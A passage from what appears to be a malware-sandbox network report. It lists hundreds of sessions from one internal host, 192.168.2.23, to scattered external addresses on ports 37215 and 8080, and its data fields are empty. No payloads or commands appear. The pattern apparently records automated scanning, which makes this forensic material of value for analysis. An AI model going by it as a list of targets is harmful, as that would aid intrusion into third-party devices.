                                                        14046192.168.2.2359904157.40.85.4737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14047192.168.2.2359974157.10.226.23637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14048192.168.2.2358700157.167.20.1837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14049192.168.2.233663847.4.188.2837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14050192.168.2.2354922157.116.100.10337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14051192.168.2.2339018163.82.142.1337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14052192.168.2.2359958197.247.34.20137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14053192.168.2.235335041.25.70.8737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14054192.168.2.2333956197.143.159.23937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14055192.168.2.2339378157.216.119.23837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14056192.168.2.233653025.24.130.16837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14057192.168.2.233436641.49.10.21837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14058192.168.2.2336330197.77.70.5737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14059192.168.2.233842296.29.205.12537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14060192.168.2.234040448.157.21.22537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14061192.168.2.235951841.238.158.8037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14062192.168.2.235021093.234.237.9237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14063192.168.2.2340238192.100.2.18737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14064192.168.2.2348070157.231.32.1137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14065192.168.2.234301841.55.20.11037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14066192.168.2.2359910192.72.105.24137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14067192.168.2.23357469.160.202.8237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14068192.168.2.2337926157.39.99.837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14069192.168.2.234616840.6.63.437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14070192.168.2.2340608197.72.110.12537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14071192.168.2.235750641.106.52.20537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14072192.168.2.2339406197.165.244.25137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14073192.168.2.2335688197.221.141.2337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14074192.168.2.23520145.199.46.12037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14075192.168.2.23505785.183.192.9637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14076192.168.2.2341844152.184.41.3137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14077192.168.2.2342046197.117.38.24437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14078192.168.2.2346732157.51.102.13937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14079192.168.2.2351750197.117.100.23337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14080192.168.2.233308057.137.24.7437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14081192.168.2.2352386197.255.247.1737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14082192.168.2.2341600157.21.206.19937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14083192.168.2.2355422197.22.181.9737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14084192.168.2.234712441.50.224.8537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14085192.168.2.2354026157.44.43.3337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14086192.168.2.2345166157.80.215.18037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14087192.168.2.234516841.66.225.13737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14088192.168.2.234046641.98.94.1037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14089192.168.2.2338800197.92.138.7737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14090192.168.2.2347124157.146.155.19437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14091192.168.2.2340612197.117.206.8837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14092192.168.2.233431841.120.184.18537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14093192.168.2.2347912217.102.132.4837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14094192.168.2.2353824139.162.8.17237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14095192.168.2.2332906197.172.106.8737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14096192.168.2.2333522197.99.17.2337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14097192.168.2.235289041.29.190.037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14098192.168.2.2356014157.193.78.2637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14099192.168.2.234417641.233.188.17837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14100192.168.2.233713241.38.94.237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14101192.168.2.235587241.83.121.22237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14102192.168.2.2333570197.116.20.9137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14103192.168.2.234286466.189.114.6037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14104192.168.2.2351464197.252.223.8037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14105192.168.2.233723441.54.145.20737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14106192.168.2.2341694157.122.34.13137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14107192.168.2.236073641.157.147.23537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14108192.168.2.234159041.191.30.16037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14109192.168.2.234517041.0.6.11337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14110192.168.2.2354552157.8.142.24437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14111192.168.2.235584041.159.208.5837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14112192.168.2.2352844157.127.96.537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14113192.168.2.2351748197.218.178.17237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14114192.168.2.235485641.30.98.14937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14115192.168.2.2347500197.226.12.10437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14116192.168.2.233474438.1.19.1437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14117192.168.2.2360496157.146.35.17237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14118192.168.2.2358164157.185.89.12537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14119192.168.2.233788041.195.10.5937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14120192.168.2.2356286157.39.143.7237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14121192.168.2.2360644197.0.167.5737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14122192.168.2.2359320120.99.125.16237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14123192.168.2.235232841.44.80.15837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14124192.168.2.235607049.136.234.17637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14125192.168.2.2344724174.46.204.25037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14126192.168.2.2357724157.44.51.16437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14127192.168.2.2349474104.224.29.3137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14128192.168.2.236018441.205.46.4837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14129192.168.2.234725041.126.156.25137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14130192.168.2.2337794137.116.73.13637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14131192.168.2.2358990157.214.125.20037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14132192.168.2.2339746197.179.250.18037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14133192.168.2.2350346197.53.97.16737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14134192.168.2.2354786157.124.164.18137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14135192.168.2.234886041.219.46.13237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14136192.168.2.234076641.56.149.10837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14137192.168.2.2335372157.14.85.23637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14138192.168.2.2337556120.92.10.24337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14139192.168.2.234725041.69.199.19637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14140192.168.2.2345290197.77.72.19737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14141192.168.2.235225441.102.154.4437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14142192.168.2.2354428197.202.110.22137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14143192.168.2.2335594197.186.42.20037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14144192.168.2.2347682222.164.133.24437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14145192.168.2.233646641.227.115.19937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14146192.168.2.2346078163.69.229.11937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14147192.168.2.235243241.23.235.4337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14148192.168.2.2348960197.212.187.16737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14149192.168.2.2356860174.244.14.7137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14150192.168.2.233311841.139.186.5637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14151192.168.2.235536841.124.168.23437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14152192.168.2.235182241.179.55.21937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14153192.168.2.2336468123.49.40.20537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14154192.168.2.2332974197.36.68.9937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14155192.168.2.234830241.187.189.9437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14156192.168.2.235578241.241.140.6237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14157192.168.2.233943441.169.66.10137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14158192.168.2.235239694.105.207.22237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14159192.168.2.2340256157.94.135.5737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14160192.168.2.2353856197.76.196.12137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14161192.168.2.235946641.182.12.5037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14162192.168.2.2344170197.195.181.18837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14163192.168.2.235630463.111.178.20137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14164192.168.2.2343636197.212.237.18737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14165192.168.2.2340068157.175.55.16837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14166192.168.2.2334480157.86.187.1837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14167192.168.2.233842241.88.131.9937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14168192.168.2.2344026197.40.145.6637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14169192.168.2.233967882.113.143.10237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14170192.168.2.2347232194.236.84.1737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14171192.168.2.2341378157.203.192.13637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14172192.168.2.2347752197.4.98.6337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14173192.168.2.2355744108.19.161.2837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14174192.168.2.234295645.131.76.18537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14175192.168.2.235833071.146.65.14037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14176192.168.2.2350374157.136.23.16937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14177192.168.2.234494841.244.156.24637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14178192.168.2.2353248157.217.247.4437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14179192.168.2.2340450197.108.22.6937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14180192.168.2.2337282161.145.8.4937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14181192.168.2.234171641.97.211.14737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14182192.168.2.235255241.83.12.14237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14183192.168.2.2344096197.27.243.23037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14184192.168.2.2335390157.180.74.19337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14185192.168.2.2344600157.23.120.12137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14186192.168.2.2344714157.35.64.23437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14187192.168.2.235073812.8.52.19237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14188192.168.2.235862441.200.132.22137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14189192.168.2.2355332157.0.133.11337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14190192.168.2.235604876.59.199.2328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14191192.168.2.2341624159.234.236.148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14192192.168.2.235825642.180.115.2398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14193192.168.2.2353484189.162.137.58080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14194192.168.2.234091882.173.64.2468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14195192.168.2.2358244112.172.221.318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14196192.168.2.233980051.10.80.318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14197192.168.2.233609262.249.229.578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14198192.168.2.234612484.205.24.2508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14199192.168.2.2357462140.119.195.138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14200192.168.2.2354142186.165.236.208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14201192.168.2.235830241.201.190.1058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14202192.168.2.23462885.52.148.808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14203192.168.2.2344930156.17.0.788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14204192.168.2.2353642166.156.215.878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14205192.168.2.2341708150.49.249.918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14206192.168.2.23458324.206.136.1148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14207192.168.2.235726262.105.16.998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14208192.168.2.2341510168.23.184.1448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14209192.168.2.233291041.206.178.1788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14210192.168.2.23339844.60.40.178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14211192.168.2.2347080222.30.82.1638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14212192.168.2.234558294.20.4.118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14213192.168.2.2358138202.156.232.1308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14214192.168.2.234374457.248.27.1038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14215192.168.2.2352476153.208.1.1978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14216192.168.2.234915618.200.63.548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14217192.168.2.234024646.41.24.2318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14218192.168.2.235964651.233.141.1668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14219192.168.2.2349086213.185.130.1068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14220192.168.2.2343020118.146.49.298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14221192.168.2.2359670104.82.159.1268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14222192.168.2.235985666.24.85.338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14223192.168.2.2336176145.220.147.668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14224192.168.2.2359342207.192.252.1178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14225192.168.2.235798684.91.132.268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14226192.168.2.235688414.128.107.1738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14227192.168.2.2353354135.223.157.408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14228192.168.2.235806057.139.30.1098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14229192.168.2.2355678140.169.74.638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14230192.168.2.235759884.211.58.1368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14231192.168.2.234486279.135.58.2098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14232192.168.2.234244825.194.6.1518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14233192.168.2.235429866.70.55.2438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14234192.168.2.2357878128.40.255.1898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14235192.168.2.2339000114.91.18.378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14236192.168.2.2343902221.185.159.2408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14237192.168.2.234585418.219.79.118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14238192.168.2.2358496208.9.251.2178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14239192.168.2.2341462102.254.174.748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14240192.168.2.2360382196.67.22.1668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14241192.168.2.234150235.229.56.758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14242192.168.2.2349768207.83.198.2438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14243192.168.2.2359204223.35.178.348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14244192.168.2.2360898140.75.116.2028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14245192.168.2.2351722139.35.196.968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14246192.168.2.234574092.130.151.2068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14247192.168.2.2352444145.13.241.1518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14248192.168.2.2357932162.60.63.48080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14249192.168.2.233504092.5.158.48080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14250192.168.2.233751283.244.189.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14251192.168.2.235646846.234.164.2418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14252192.168.2.235411875.141.235.138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14253192.168.2.2346130131.216.139.238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14254192.168.2.2353088206.92.84.378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14255192.168.2.23552728.178.69.2198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
